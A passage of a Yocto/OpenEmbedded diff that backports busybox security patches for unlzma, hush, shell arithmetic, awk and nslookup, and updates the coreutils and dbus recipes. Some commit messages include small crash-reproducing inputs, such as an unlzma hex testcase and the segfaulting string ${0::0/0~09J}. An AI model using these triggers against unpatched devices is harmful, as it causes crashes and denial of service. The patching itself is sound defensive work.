38@@ -419,7 +419,7 @@ static int parse_reply(const unsigned char *msg, size_t len)
39 //printf("Cannot uncompress MX domain: %s\n", strerror(errno));
40 return -1;
41 }
42- printf("%s\tmail exchanger = %d %s\n", ns_rr_name(rr), n, dname);
43+ printf("%s\tmail exchanger = %d %s\n", ns_rr_name(rr), n, printable_string(dname));
44 break;
45
46 case ns_t_txt:
47@@ -431,7 +431,7 @@ static int parse_reply(const unsigned char *msg, size_t len)
48 if (n > 0) {
49 memset(dname, 0, sizeof(dname));
50 memcpy(dname, ns_rr_rdata(rr) + 1, n);
51- printf("%s\ttext = \"%s\"\n", ns_rr_name(rr), dname);
52+ printf("%s\ttext = \"%s\"\n", ns_rr_name(rr), printable_string(dname));
53 }
54 break;
55
56@@ -461,7 +461,7 @@ static int parse_reply(const unsigned char *msg, size_t len)
57 return -1;
58 }
59
60- printf("\tmail addr = %s\n", dname);
61+ printf("\tmail addr = %s\n", printable_string(dname));
62 cp += n;
63
64 printf("\tserial = %lu\n", ns_get32(cp));
diff --git a/meta/recipes-core/busybox/busybox/CVE-2021-42374.patch b/meta/recipes-core/busybox/busybox/CVE-2021-42374.patch
new file mode 100644
index 0000000000..aef8a3db85
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/CVE-2021-42374.patch
@@ -0,0 +1,53 @@
1From 04f052c56ded5ab6a904e3a264a73dc0412b2e78 Mon Sep 17 00:00:00 2001
2From: Denys Vlasenko <vda.linux@googlemail.com>
3Date: Tue, 15 Jun 2021 15:07:57 +0200
4Subject: [PATCH] unlzma: fix a case where we could read before beginning of
5 buffer
6Cc: pavel@zhukoff.net
7
8Testcase:
9
10 21 01 01 00 00 00 00 00 e7 01 01 01 ef 00 df b6
11 00 17 02 10 11 0f ff 00 16 00 00
12
13Unfortunately, the bug is not reliably causing a segfault,
14the behavior depends on what's in memory before the buffer.
15
16function old new delta
17unpack_lzma_stream 2762 2768 +6
18
19Signed-off-by: Denys Vlasenko <vda.linux@googlemail.com>
20
21Signed-off-by: Pavel Zhukov <pavel.zhukov@huawei.com>
22
23CVE: CVE-2021-42374
24Upstream-Status: Backport [https://git.busybox.net/busybox/commit/?h=1_33_stable&id=d326be2850ea2bd78fe2c22d6c45c3b861d82937]
25Comment: testdata dropped because of binary format
26
27---
28 archival/libarchive/decompress_unlzma.c | 5 ++++-
29 testsuite/unlzma.tests | 17 +++++++++++++----
30 testsuite/unlzma_issue_3.lzma | Bin 0 -> 27 bytes
31 3 files changed, 17 insertions(+), 5 deletions(-)
32 create mode 100644 testsuite/unlzma_issue_3.lzma
33
34diff --git a/archival/libarchive/decompress_unlzma.c b/archival/libarchive/decompress_unlzma.c
35index 0744f231a1d64d92676b0cada2342f88f3b39b31..fb5aac8fe9ea0c53e0c2d7a7cbd05a753e39bc9d 100644
36--- a/archival/libarchive/decompress_unlzma.c
37+++ b/archival/libarchive/decompress_unlzma.c
38@@ -290,8 +290,11 @@ unpack_lzma_stream(transformer_state_t *xstate)
39 uint32_t pos;
40
41 pos = buffer_pos - rep0;
42- if ((int32_t)pos < 0)
43+ if ((int32_t)pos < 0) {
44 pos += header.dict_size;
45+ if ((int32_t)pos < 0)
46+ goto bad;
47+ }
48 match_byte = buffer[pos];
49 do {
50 int bit;
51--
522.34.0
53
diff --git a/meta/recipes-core/busybox/busybox/CVE-2021-42376.patch b/meta/recipes-core/busybox/busybox/CVE-2021-42376.patch
new file mode 100644
index 0000000000..c913eaee9c
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/CVE-2021-42376.patch
@@ -0,0 +1,138 @@
1From 56a335378ac100d51c30b21eee499a2effa37fba Mon Sep 17 00:00:00 2001
2From: Denys Vlasenko <vda.linux@googlemail.com>
3Date: Tue, 15 Jun 2021 16:05:57 +0200
4Subject: hush: fix handling of \^C and "^C"
5
6function old new delta
7parse_stream 2238 2252 +14
8encode_string 243 256 +13
9------------------------------------------------------------------------------
10(add/remove: 0/0 grow/shrink: 2/0 up/down: 27/0) Total: 27 bytes
11
12Signed-off-by: Denys Vlasenko <vda.linux@googlemail.com>
13(cherry picked from commit 1b7a9b68d0e9aa19147d7fda16eb9a6b54156985)
14
15Signed-off-by: Pavel Zhukov <pavel.zhukov@huawei.com>
16
17CVE: CVE-2021-42376
18Upstream-Status: Backport [https://git.busybox.net/busybox/patch/?id=56a335378ac100d51c30b21eee499a2effa37fba]
19Comment: No changes in any hunk
20---
21 shell/ash_test/ash-misc/control_char3.right | 1 +
22 shell/ash_test/ash-misc/control_char3.tests | 2 ++
23 shell/ash_test/ash-misc/control_char4.right | 1 +
24 shell/ash_test/ash-misc/control_char4.tests | 2 ++
25 shell/hush.c | 11 +++++++++++
26 shell/hush_test/hush-misc/control_char3.right | 1 +
27 shell/hush_test/hush-misc/control_char3.tests | 2 ++
28 shell/hush_test/hush-misc/control_char4.right | 1 +
29 shell/hush_test/hush-misc/control_char4.tests | 2 ++
30 9 files changed, 23 insertions(+)
31 create mode 100644 shell/ash_test/ash-misc/control_char3.right
32 create mode 100755 shell/ash_test/ash-misc/control_char3.tests
33 create mode 100644 shell/ash_test/ash-misc/control_char4.right
34 create mode 100755 shell/ash_test/ash-misc/control_char4.tests
35 create mode 100644 shell/hush_test/hush-misc/control_char3.right
36 create mode 100755 shell/hush_test/hush-misc/control_char3.tests
37 create mode 100644 shell/hush_test/hush-misc/control_char4.right
38 create mode 100755 shell/hush_test/hush-misc/control_char4.tests
39
40diff --git a/shell/ash_test/ash-misc/control_char3.right b/shell/ash_test/ash-misc/control_char3.right
41new file mode 100644
42index 000000000..283e02cbb
43--- /dev/null
44+++ b/shell/ash_test/ash-misc/control_char3.right
45@@ -0,0 +1 @@
46+SHELL: line 1: : not found
47diff --git a/shell/ash_test/ash-misc/control_char3.tests b/shell/ash_test/ash-misc/control_char3.tests
48new file mode 100755
49index 000000000..4359db3f3
50--- /dev/null
51+++ b/shell/ash_test/ash-misc/control_char3.tests
52@@ -0,0 +1,2 @@
53+# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages)
54+$THIS_SH -c '\' SHELL
55diff --git a/shell/ash_test/ash-misc/control_char4.right b/shell/ash_test/ash-misc/control_char4.right
56new file mode 100644
57index 000000000..2bf18e684
58--- /dev/null
59+++ b/shell/ash_test/ash-misc/control_char4.right
60@@ -0,0 +1 @@
61+SHELL: line 1: -: not found
62diff --git a/shell/ash_test/ash-misc/control_char4.tests b/shell/ash_test/ash-misc/control_char4.tests
63new file mode 100755
64index 000000000..48010f154
65--- /dev/null
66+++ b/shell/ash_test/ash-misc/control_char4.tests
67@@ -0,0 +1,2 @@
68+# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages)
69+$THIS_SH -c '"-"' SHELL
70diff --git a/shell/hush.c b/shell/hush.c
71index 9fead37da..249728b9d 100644
72--- a/shell/hush.c
73+++ b/shell/hush.c
74@@ -5235,6 +5235,11 @@ static int encode_string(o_string *as_string,
75 }
76 #endif
77 o_addQchr(dest, ch);
78+ if (ch == SPECIAL_VAR_SYMBOL) {
79+ /* Convert "^C" to corresponding special variable reference */
80+ o_addchr(dest, SPECIAL_VAR_QUOTED_SVS);
81+ o_addchr(dest, SPECIAL_VAR_SYMBOL);
82+ }
83 goto again;
84 #undef as_string
85 }
86@@ -5346,6 +5351,11 @@ static struct pipe *parse_stream(char **pstring,
87 if (ch == '\n')
88 continue; /* drop \<newline>, get next char */
89 nommu_addchr(&ctx.as_string, '\\');
90+ if (ch == SPECIAL_VAR_SYMBOL) {
91+ nommu_addchr(&ctx.as_string, ch);
92+ /* Convert \^C to corresponding special variable reference */
93+ goto case_SPECIAL_VAR_SYMBOL;
94+ }
95 o_addchr(&ctx.word, '\\');
96 if (ch == EOF) {
97 /* Testcase: eval 'echo Ok\' */
98@@ -5670,6 +5680,7 @@ static struct pipe *parse_stream(char **pstring,
99 /* Note: nommu_addchr(&ctx.as_string, ch) is already done */
100
101 switch (ch) {
102+ case_SPECIAL_VAR_SYMBOL:
103 case SPECIAL_VAR_SYMBOL:
104 /* Convert raw ^C to corresponding special variable reference */
105 o_addchr(&ctx.word, SPECIAL_VAR_SYMBOL);
106diff --git a/shell/hush_test/hush-misc/control_char3.right b/shell/hush_test/hush-misc/control_char3.right
107new file mode 100644
108index 000000000..94b4f8699
109--- /dev/null
110+++ b/shell/hush_test/hush-misc/control_char3.right
111@@ -0,0 +1 @@
112+hush: can't execute '': No such file or directory
113diff --git a/shell/hush_test/hush-misc/control_char3.tests b/shell/hush_test/hush-misc/control_char3.tests
114new file mode 100755
115index 000000000..4359db3f3
116--- /dev/null
117+++ b/shell/hush_test/hush-misc/control_char3.tests
118@@ -0,0 +1,2 @@
119+# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages)
120+$THIS_SH -c '\' SHELL
121diff --git a/shell/hush_test/hush-misc/control_char4.right b/shell/hush_test/hush-misc/control_char4.right
122new file mode 100644
123index 000000000..698e21427
124--- /dev/null
125+++ b/shell/hush_test/hush-misc/control_char4.right
126@@ -0,0 +1 @@
127+hush: can't execute '-': No such file or directory
128diff --git a/shell/hush_test/hush-misc/control_char4.tests b/shell/hush_test/hush-misc/control_char4.tests
129new file mode 100755
130index 000000000..48010f154
131--- /dev/null
132+++ b/shell/hush_test/hush-misc/control_char4.tests
133@@ -0,0 +1,2 @@
134+# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages)
135+$THIS_SH -c '"-"' SHELL
136--
137cgit v1.2.3
138
diff --git a/meta/recipes-core/busybox/busybox/CVE-2022-48174.patch b/meta/recipes-core/busybox/busybox/CVE-2022-48174.patch
new file mode 100644
index 0000000000..dfba2a7e0f
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/CVE-2022-48174.patch
@@ -0,0 +1,82 @@
1From c18ebf861528ef24958dd99a146482d2a40014c7 Mon Sep 17 00:00:00 2001
2From: Denys Vlasenko <vda.linux@googlemail.com>
3Date: Mon, 12 Jun 2023 17:48:47 +0200
4Subject: [PATCH] shell: avoid segfault on ${0::0/0~09J}. Closes 15216
5
6function old new delta
7evaluate_string 1011 1053 +42
8
9CVE: CVE-2022-48174
10Upstream-Status: Backport [d417193cf37ca1005830d7e16f5fa7e1d8a44209]
11Signed-off-by: Denys Vlasenko <vda.linux@googlemail.com>
12---
13 shell/math.c | 39 +++++++++++++++++++++++++++++++++++----
14 1 file changed, 35 insertions(+), 4 deletions(-)
15
16diff --git a/shell/math.c b/shell/math.c
17index af1ab55c0..79824e81f 100644
18--- a/shell/math.c
19+++ b/shell/math.c
20@@ -578,6 +578,28 @@ static arith_t strto_arith_t(const char *nptr, char **endptr)
21 # endif
22 #endif
23
24+//TODO: much better estimation than expr_len/2? Such as:
25+//static unsigned estimate_nums_and_names(const char *expr)
26+//{
27+// unsigned count = 0;
28+// while (*(expr = skip_whitespace(expr)) != '\0') {
29+// const char *p;
30+// if (isdigit(*expr)) {
31+// while (isdigit(*++expr))
32+// continue;
33+// count++;
34+// continue;
35+// }
36+// p = endofname(expr);
37+// if (p != expr) {
38+// expr = p;
39+// count++;
40+// continue;
41+// }
42+// }
43+// return count;
44+//}
45+
46 static arith_t FAST_FUNC
47 evaluate_string(arith_state_t *math_state, const char *expr)
48 {
49@@ -585,10 +607,12 @@ evaluate_string(arith_state_t *math_state, const char *expr)
50 const char *errmsg;
51 const char *start_expr = expr = skip_whitespace(expr);
52 unsigned expr_len = strlen(expr) + 2;
53- /* Stack of integers */
54- /* The proof that there can be no more than strlen(startbuf)/2+1
55- * integers in any given correct or incorrect expression
56- * is left as an exercise to the reader. */
57+ /* Stack of integers/names */
58+ /* There can be no more than strlen(startbuf)/2+1
59+ * integers/names in any given correct or incorrect expression.
60+ * (modulo "09v09v09v09v09v" case,
61+ * but we have code to detect that early)
62+ */
63 var_or_num_t *const numstack = alloca((expr_len / 2) * sizeof(numstack[0]));
64 var_or_num_t *numstackptr = numstack;
65 /* Stack of operator tokens */
66@@ -657,6 +681,13 @@ evaluate_string(arith_state_t *math_state, const char *expr)
67 numstackptr->var = NULL;
68 errno = 0;
69 numstackptr->val = strto_arith_t(expr, (char**) &expr);
70+ /* A number can't be followed by another number, or a variable name.
71+ * We'd catch this later anyway, but this would require numstack[]
72+ * to be twice as deep to handle strings where _every_ char is
73+ * a new number or name. Example: 09v09v09v09v09v09v09v09v09v
74+ */
75+ if (isalnum(*expr) || *expr == '_')
76+ goto err;
77 if (errno)
78 numstackptr->val = 0; /* bash compat */
79 goto num;
80--
812.40.1
82
diff --git a/meta/recipes-core/busybox/busybox_1.31.1.bb b/meta/recipes-core/busybox/busybox_1.31.1.bb
index 7563368287..94aa1467df 100644
--- a/meta/recipes-core/busybox/busybox_1.31.1.bb
+++ b/meta/recipes-core/busybox/busybox_1.31.1.bb
@@ -50,7 +50,15 @@ SRC_URI = "https://busybox.net/downloads/busybox-${PV}.tar.bz2;name=tarball \
50 file://0001-sysctl-ignore-EIO-of-stable_secret-below-proc-sys-ne.patch \ 50 file://0001-sysctl-ignore-EIO-of-stable_secret-below-proc-sys-ne.patch \
51 file://busybox-CVE-2018-1000500.patch \ 51 file://busybox-CVE-2018-1000500.patch \
52 file://0001-hwclock-make-glibc-2.31-compatible.patch \ 52 file://0001-hwclock-make-glibc-2.31-compatible.patch \
53" 53 file://0001-decompress_gunzip-Fix-DoS-if-gzip-is-corrupt.patch \
54 file://0001-mktemp-add-tmpdir-option.patch \
55 file://CVE-2021-42374.patch \
56 file://CVE-2021-42376.patch \
57 file://CVE-2021-423xx-awk.patch \
58 file://CVE-2022-48174.patch \
59 file://0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch \
60 file://0002-nslookup-sanitize-all-printed-strings-with-printable.patch \
61 "
54SRC_URI_append_libc-musl = " file://musl.cfg " 62SRC_URI_append_libc-musl = " file://musl.cfg "
55 63
56SRC_URI[tarball.md5sum] = "70913edaf2263a157393af07565c17f0" 64SRC_URI[tarball.md5sum] = "70913edaf2263a157393af07565c17f0"
diff --git a/meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch b/meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch
new file mode 100644
index 0000000000..7e3d47b88c
--- /dev/null
+++ b/meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch
@@ -0,0 +1,215 @@
1From a21708eb8d07b4a6dbc1d3e4ace4c5721515a84c Mon Sep 17 00:00:00 2001
2From: Sana Kazi <Sana.Kazi@kpit.com>
3Date: Wed, 8 Dec 2021 12:25:34 +0530
4Subject: [PATCH] busybox: Fix multiple security issues in awk
5
6Description: fix multiple security issues in awk
7Origin: backported awk.c from busybox 1.34.1
8
9CVE: CVE-2021-42378
10CVE: CVE-2021-42379
11CVE: CVE-2021-42380
12CVE: CVE-2021-42381
13CVE: CVE-2021-42382
14CVE: CVE-2021-42384
15CVE: CVE-2021-42385
16CVE: CVE-2021-42386
17
18Upstream-Status: Backport [https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/busybox/1:1.30.1-6ubuntu3.1/busybox_1.30.1-6ubuntu3.1.debian.tar.xz]
19
20Comment: Refreshed first hunk and removed few hunks as they are already present in source.
21
22Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
23Signed-off-by: Ranjitsinh Rathod <Ranjitsinh.Rathod@kpit.com>
24
25---
26 editors/awk.c | 80 ++++++++++++++++++++++++++++++++++++++-------------
27 1 file changed, 60 insertions(+), 20 deletions(-)
28
29diff --git a/editors/awk.c b/editors/awk.c
30index d25508e..4e4f282 100644
31--- a/editors/awk.c
32+++ b/editors/awk.c
33@@ -272,7 +272,8 @@ typedef struct tsplitter_s {
34 /* if previous token class is CONCAT1 and next is CONCAT2, concatenation */
35 /* operator is inserted between them */
36 #define TC_CONCAT1 (TC_VARIABLE | TC_ARRTERM | TC_SEQTERM \
37- | TC_STRING | TC_NUMBER | TC_UOPPOST)
38+ | TC_STRING | TC_NUMBER | TC_UOPPOST \
39+ | TC_LENGTH)
40 #define TC_CONCAT2 (TC_OPERAND | TC_UOPPRE)
41
42 #define OF_RES1 0x010000
43@@ -404,7 +405,7 @@ static const char tokenlist[] ALIGN1 =
44
45 #define OC_B OC_BUILTIN
46
47-static const uint32_t tokeninfo[] = {
48+static const uint32_t tokeninfo[] ALIGN4 = {
49 0,
50 0,
51 OC_REGEXP,
52@@ -1070,8 +1071,10 @@ static uint32_t next_token(uint32_t expected)
53 const uint32_t *ti;
54
55 if (t_rollback) {
56+ debug_printf_parse("%s: using rolled-back token\n", __func__);
57 t_rollback = FALSE;
58 } else if (concat_inserted) {
59+ debug_printf_parse("%s: using concat-inserted token\n", __func__);
60 concat_inserted = FALSE;
61 t_tclass = save_tclass;
62 t_info = save_info;
63@@ -1200,7 +1203,11 @@ static uint32_t next_token(uint32_t expected)
64 goto readnext;
65
66 /* insert concatenation operator when needed */
67- if ((ltclass & TC_CONCAT1) && (tc & TC_CONCAT2) && (expected & TC_BINOP)) {
68+ debug_printf_parse("%s: %x %x %x concat_inserted?\n", __func__,
69+ (ltclass & TC_CONCAT1), (tc & TC_CONCAT2), (expected & TC_BINOP));
70+ if ((ltclass & TC_CONCAT1) && (tc & TC_CONCAT2) && (expected & TC_BINOP)
71+ && !(ltclass == TC_LENGTH && tc == TC_SEQSTART) /* but not for "length(..." */
72+ ) {
73 concat_inserted = TRUE;
74 save_tclass = tc;
75 save_info = t_info;
76@@ -1208,6 +1215,7 @@ static uint32_t next_token(uint32_t expected)
77 t_info = OC_CONCAT | SS | P(35);
78 }
79
80+ debug_printf_parse("%s: t_tclass=tc=%x\n", __func__, t_tclass);
81 t_tclass = tc;
82 }
83 ltclass = t_tclass;
84@@ -1218,6 +1226,7 @@ static uint32_t next_token(uint32_t expected)
85 EMSG_UNEXP_EOS : EMSG_UNEXP_TOKEN);
86 }
87
88+ debug_printf_parse("%s: returning, ltclass:%x t_double:%f\n", __func__, ltclass, t_double);
89 return ltclass;
90 #undef concat_inserted
91 #undef save_tclass
92@@ -1282,7 +1291,7 @@ static node *parse_expr(uint32_t iexp)
93 glptr = NULL;
94
95 } else if (tc & (TC_BINOP | TC_UOPPOST)) {
96- debug_printf_parse("%s: TC_BINOP | TC_UOPPOST\n", __func__);
97+ debug_printf_parse("%s: TC_BINOP | TC_UOPPOST tc:%x\n", __func__, tc);
98 /* for binary and postfix-unary operators, jump back over
99 * previous operators with higher priority */
100 vn = cn;
101@@ -1350,8 +1359,10 @@ static node *parse_expr(uint32_t iexp)
102 v = cn->l.v = xzalloc(sizeof(var));
103 if (tc & TC_NUMBER)
104 setvar_i(v, t_double);
105- else
106+ else {
107 setvar_s(v, t_string);
108+ xtc &= ~TC_UOPPOST; /* "str"++ is not allowed */
109+ }
110 break;
111
112 case TC_REGEXP:
113@@ -1387,7 +1398,12 @@ static node *parse_expr(uint32_t iexp)
114
115 case TC_LENGTH:
116 debug_printf_parse("%s: TC_LENGTH\n", __func__);
117- next_token(TC_SEQSTART | TC_OPTERM | TC_GRPTERM);
118+ next_token(TC_SEQSTART /* length(...) */
119+ | TC_OPTERM /* length; (or newline)*/
120+ | TC_GRPTERM /* length } */
121+ | TC_BINOPX /* length <op> NUM */
122+ | TC_COMMA /* print length, 1 */
123+ );
124 rollback_token();
125 if (t_tclass & TC_SEQSTART) {
126 /* It was a "(" token. Handle just like TC_BUILTIN */
127@@ -1747,12 +1763,34 @@ static void fsrealloc(int size)
128 nfields = size;
129 }
130
131+static int regexec1_nonempty(const regex_t *preg, const char *s, regmatch_t pmatch[])
132+{
133+ int r = regexec(preg, s, 1, pmatch, 0);
134+ if (r == 0 && pmatch[0].rm_eo == 0) {
135+ /* For example, happens when FS can match
136+ * an empty string (awk -F ' *'). Logically,
137+ * this should split into one-char fields.
138+ * However, gawk 5.0.1 searches for first
139+ * _non-empty_ separator string match:
140+ */
141+ size_t ofs = 0;
142+ do {
143+ ofs++;
144+ if (!s[ofs])
145+ return REG_NOMATCH;
146+ regexec(preg, s + ofs, 1, pmatch, 0);
147+ } while (pmatch[0].rm_eo == 0);
148+ pmatch[0].rm_so += ofs;
149+ pmatch[0].rm_eo += ofs;
150+ }
151+ return r;
152+}
153+
154 static int awk_split(const char *s, node *spl, char **slist)
155 {
156- int l, n;
157+ int n;
158 char c[4];
159 char *s1;
160- regmatch_t pmatch[2]; // TODO: why [2]? [1] is enough...
161
162 /* in worst case, each char would be a separate field */
163 *slist = s1 = xzalloc(strlen(s) * 2 + 3);
164@@ -1769,29 +1807,31 @@ static int awk_split(const char *s, node *spl, char **slist)
165 return n; /* "": zero fields */
166 n++; /* at least one field will be there */
167 do {
168+ int l;
169+ regmatch_t pmatch[2]; // TODO: why [2]? [1] is enough...
170+
171 l = strcspn(s, c+2); /* len till next NUL or \n */
172- if (regexec(icase ? spl->r.ire : spl->l.re, s, 1, pmatch, 0) == 0
173+ if (regexec1_nonempty(icase ? spl->r.ire : spl->l.re, s, pmatch) == 0
174 && pmatch[0].rm_so <= l
175 ) {
176+ /* if (pmatch[0].rm_eo == 0) ... - impossible */
177 l = pmatch[0].rm_so;
178- if (pmatch[0].rm_eo == 0) {
179- l++;
180- pmatch[0].rm_eo++;
181- }
182 n++; /* we saw yet another delimiter */
183 } else {
184 pmatch[0].rm_eo = l;
185 if (s[l])
186 pmatch[0].rm_eo++;
187 }
188- memcpy(s1, s, l);
189- /* make sure we remove *all* of the separator chars */
190- do {
191- s1[l] = '\0';
192- } while (++l < pmatch[0].rm_eo);
193- nextword(&s1);
194+ s1 = mempcpy(s1, s, l);
195+ *s1++ = '\0';
196 s += pmatch[0].rm_eo;
197 } while (*s);
198+
199+ /* echo a-- | awk -F-- '{ print NF, length($NF), $NF }'
200+ * should print "2 0 ":
201+ */
202+ *s1 = '\0';
203+
204 return n;
205 }
206 if (c[0] == '\0') { /* null split */
207@@ -1995,7 +2035,7 @@ static int ptest(node *pattern)
208 static int awk_getline(rstream *rsm, var *v)
209 {
210 char *b;
211- regmatch_t pmatch[2];
212+ regmatch_t pmatch[2]; // TODO: why [2]? [1] is enough...
213 int size, a, p, pp = 0;
214 int fd, so, eo, r, rp;
215 char c, *m, *s;
diff --git a/meta/recipes-core/coreutils/coreutils_8.31.bb b/meta/recipes-core/coreutils/coreutils_8.31.bb
index 7dd9e41def..3841f71155 100644
--- a/meta/recipes-core/coreutils/coreutils_8.31.bb
+++ b/meta/recipes-core/coreutils/coreutils_8.31.bb
@@ -26,6 +26,10 @@ SRC_URI_append_libc-musl = "file://strtod_fix_clash_with_strtold.patch"
26SRC_URI[md5sum] = "0009a224d8e288e8ec406ef0161f9293" 26SRC_URI[md5sum] = "0009a224d8e288e8ec406ef0161f9293"
27SRC_URI[sha256sum] = "ff7a9c918edce6b4f4b2725e3f9b37b0c4d193531cac49a48b56c4d0d3a9e9fd" 27SRC_URI[sha256sum] = "ff7a9c918edce6b4f4b2725e3f9b37b0c4d193531cac49a48b56c4d0d3a9e9fd"
28 28
29# http://git.savannah.gnu.org/cgit/coreutils.git/commit/?id=v8.27-101-gf5d7c0842
30# runcon is not really a sandbox command, use `runcon ... setsid ...` to avoid this particular issue.
31CVE_CHECK_WHITELIST += "CVE-2016-2781"
32
29EXTRA_OECONF_class-native = "--without-gmp" 33EXTRA_OECONF_class-native = "--without-gmp"
30EXTRA_OECONF_class-target = "--enable-install-program=arch,hostname --libexecdir=${libdir}" 34EXTRA_OECONF_class-target = "--enable-install-program=arch,hostname --libexecdir=${libdir}"
31EXTRA_OECONF_class-nativesdk = "--enable-install-program=arch,hostname" 35EXTRA_OECONF_class-nativesdk = "--enable-install-program=arch,hostname"
@@ -47,6 +51,7 @@ PACKAGECONFIG_class-nativesdk ??= "xattr"
47PACKAGECONFIG[acl] = "--enable-acl,--disable-acl,acl," 51PACKAGECONFIG[acl] = "--enable-acl,--disable-acl,acl,"
48PACKAGECONFIG[xattr] = "--enable-xattr,--disable-xattr,attr," 52PACKAGECONFIG[xattr] = "--enable-xattr,--disable-xattr,attr,"
49PACKAGECONFIG[single-binary] = "--enable-single-binary,--disable-single-binary,," 53PACKAGECONFIG[single-binary] = "--enable-single-binary,--disable-single-binary,,"
54PACKAGECONFIG[openssl] = "--with-openssl=yes,--with-openssl=no,openssl"
50 55
51# [ df mktemp nice printenv base64 gets a special treatment and is not included in this 56# [ df mktemp nice printenv base64 gets a special treatment and is not included in this
52bindir_progs = "arch basename chcon cksum comm csplit cut dir dircolors dirname du \ 57bindir_progs = "arch basename chcon cksum comm csplit cut dir dircolors dirname du \
@@ -202,6 +207,3 @@ do_install_ptest () {
202} 207}
203 208
204FILES_${PN}-ptest += "${bindir}/getlimits" 209FILES_${PN}-ptest += "${bindir}/getlimits"
205
206# These are specific to Opensuse
207CVE_WHITELIST += "CVE-2013-0221 CVE-2013-0222 CVE-2013-0223"
diff --git a/meta/recipes-core/dbus-wait/dbus-wait_git.bb b/meta/recipes-core/dbus-wait/dbus-wait_git.bb
index c24295b537..b39f7523c0 100644
--- a/meta/recipes-core/dbus-wait/dbus-wait_git.bb
+++ b/meta/recipes-core/dbus-wait/dbus-wait_git.bb
@@ -1,5 +1,6 @@
1SUMMARY = "A simple tool to wait for a specific signal over DBus" 1SUMMARY = "A simple tool to wait for a specific signal over DBus"
2HOMEPAGE = "http://git.yoctoproject.org/cgit/cgit.cgi/dbus-wait" 2HOMEPAGE = "http://git.yoctoproject.org/cgit/cgit.cgi/dbus-wait"
3DESCRIPTION = "${SUMMARY}"
3SECTION = "base" 4SECTION = "base"
4LICENSE = "GPLv2" 5LICENSE = "GPLv2"
5LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" 6LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
@@ -10,7 +11,7 @@ SRCREV = "6cc6077a36fe2648a5f993fe7c16c9632f946517"
10PV = "0.1+git${SRCPV}" 11PV = "0.1+git${SRCPV}"
11PR = "r2" 12PR = "r2"
12 13
13SRC_URI = "git://git.yoctoproject.org/${BPN}" 14SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master"
14UPSTREAM_CHECK_COMMITS = "1" 15UPSTREAM_CHECK_COMMITS = "1"
15 16
16S = "${WORKDIR}/git" 17S = "${WORKDIR}/git"
diff --git a/meta/recipes-core/dbus/dbus-test_1.12.16.bb b/meta/recipes-core/dbus/dbus-test_1.12.24.bb
index bea0e74ed0..755c841bad 100644
--- a/meta/recipes-core/dbus/dbus-test_1.12.16.bb
+++ b/meta/recipes-core/dbus/dbus-test_1.12.24.bb
@@ -1,57 +1,31 @@
1SUMMARY = "D-Bus test package (for D-bus functionality testing only)" 1SUMMARY = "D-Bus test package (for D-bus functionality testing only)"
2HOMEPAGE = "http://dbus.freedesktop.org" 2HOMEPAGE = "http://dbus.freedesktop.org"
3SECTION = "base" 3SECTION = "base"
4LICENSE = "AFL-2.1 | GPLv2+"
5LIC_FILES_CHKSUM = "file://COPYING;md5=10dded3b58148f3f1fd804b26354af3e \
6 file://dbus/dbus.h;beginline=6;endline=20;md5=7755c9d7abccd5dbd25a6a974538bb3c"
7 4
8DEPENDS = "dbus glib-2.0" 5require dbus.inc
9 6
10RDEPENDS_${PN}-dev = "" 7SRC_URI += "file://run-ptest \
8 file://python-config.patch \
9 "
11 10
12SRC_URI = "http://dbus.freedesktop.org/releases/dbus/dbus-${PV}.tar.gz \ 11DEPENDS = "dbus glib-2.0"
13 file://tmpdir.patch \
14 file://run-ptest \
15 file://python-config.patch \
16 file://clear-guid_from_server-if-send_negotiate_unix_f.patch \
17 "
18 12
19SRC_URI[md5sum] = "2dbeae80dfc9e3632320c6a53d5e8890" 13RDEPENDS_${PN}-dev = ""
20SRC_URI[sha256sum] = "54a22d2fa42f2eb2a871f32811c6005b531b9613b1b93a0d269b05e7549fec80"
21 14
22S="${WORKDIR}/dbus-${PV}" 15S="${WORKDIR}/dbus-${PV}"
23FILESEXTRAPATHS =. "${FILE_DIRNAME}/dbus:" 16FILESEXTRAPATHS =. "${FILE_DIRNAME}/dbus:"
24 17
25inherit autotools pkgconfig gettext ptest upstream-version-is-even 18inherit ptest
26 19
27EXTRA_OECONF_X = "${@bb.utils.contains('DISTRO_FEATURES', 'x11', '--with-x', '--without-x', d)}" 20EXTRA_OECONF += "--enable-tests \
28EXTRA_OECONF_X_class-native = "--without-x"
29
30EXTRA_OECONF = "--enable-tests \
31 --enable-modular-tests \ 21 --enable-modular-tests \
32 --enable-installed-tests \ 22 --enable-installed-tests \
33 --enable-checks \ 23 --enable-checks \
34 --enable-asserts \ 24 --enable-asserts \
35 --enable-largefile \
36 --disable-xml-docs \
37 --disable-doxygen-docs \
38 --disable-libaudit \
39 --with-dbus-test-dir=${PTEST_PATH} \ 25 --with-dbus-test-dir=${PTEST_PATH} \
40 ${EXTRA_OECONF_X} \
41 --enable-embedded-tests \ 26 --enable-embedded-tests \
42 " 27 "
43 28
44EXTRA_OECONF_append_class-target = " SYSTEMCTL=${base_bindir}/systemctl"
45
46PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'systemd x11', d)}"
47PACKAGECONFIG_class-native = ""
48PACKAGECONFIG_class-nativesdk = ""
49
50PACKAGECONFIG[systemd] = "--enable-systemd --with-systemdsystemunitdir=${systemd_system_unitdir},--disable-systemd --without-systemdsystemunitdir,systemd"
51PACKAGECONFIG[x11] = "--with-x --enable-x11-autolaunch,--without-x --disable-x11-autolaunch, virtual/libx11 libsm"
52PACKAGECONFIG[user-session] = "--enable-user-session --with-systemduserunitdir=${systemd_user_unitdir},--disable-user-session"
53PACKAGECONFIG[verbose-mode] = "--enable-verbose-mode,,,"
54
55do_install() { 29do_install() {
56 : 30 :
57} 31}
